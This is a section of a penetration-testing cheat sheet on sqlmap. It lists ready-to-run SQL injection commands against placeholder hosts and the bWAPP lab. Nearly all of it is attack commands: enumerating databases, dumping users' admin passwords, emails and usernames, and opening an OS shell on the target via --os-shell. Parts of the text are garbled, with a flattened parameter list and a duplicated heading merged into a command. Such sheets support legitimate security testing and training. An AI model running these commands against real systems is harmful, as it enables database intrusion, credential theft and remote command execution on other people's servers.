4.3.6 SQLMap
SQLMap
sqlmap -r <REQUEST_FILE> -p <POST_PARAMETER>
sqlmap -r Post.req
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id #GET Method
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" #POST Method
Get database if injection Exists
sqlmap -r login.req --dbs
sqlmap -u "http://10.10.10.10/file.php?id=1" --dbs #determine the databases:
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id --dbs #GET Method
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" --dbs #POST Method
# List databases
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title --dbs
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP --tables
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP -T users --columns
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP -T users -C admin,password,email --dump
Get Tables in a Database
sqlmap -r login.req -D dbname --tables #determine the tables:
sqlmap -u "http://10.10.10.10/file.php?id=1" -D dbname --common-tables #if tables not available, guess tables using common names
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id -D dbname --tables #GET Method
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" -D dbname --tables #POST Method
Get data in a Database tables
sqlmap -r login.req -D dbname -T table_name --dump
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id -D dbname -T table_name --dump #GET Method
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" -D dbname -T table_name --dump #POST Method
Get OS-Shell
sqlmap -u "http://10.10.10.10/file.php?id=1" --os-shell
Example of usage
Dumping emails from a table
sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT -D ecommerce -T users -C email --dump
Common parameters
-u
: The vulnerable URL.-p
: The parameter you suspect is injectable.--dbms=mysql
: You know the backend DBMS is MySQL.--level=5 --risk=3
: Enables deeper and riskier tests.--technique=EUBT
: Restricts the type of SQLi techniques used (Error, Union, Boolean, Time-based).-D ecommerce
: Targeting theecommerce
database.-T users
: Looking into theusers
table.-C email
: Only extracting theemail
column.--dump
: Actually retrieves the data.
Listing columns of a table
sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT -D ecommerce -T users --columns
Dumping usernames
sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT -D ecommerce -T users -C username --dump
Listing columns of the users
table again (can be used for planning further dumps)
users
table again (can be used for planning further dumps)sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT -D ecommerce -T users --columns
Enumerating tables with specific prefix/suffix
sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT --current-db --prefix="ecom_" --suffix="_log" --tables
Last updated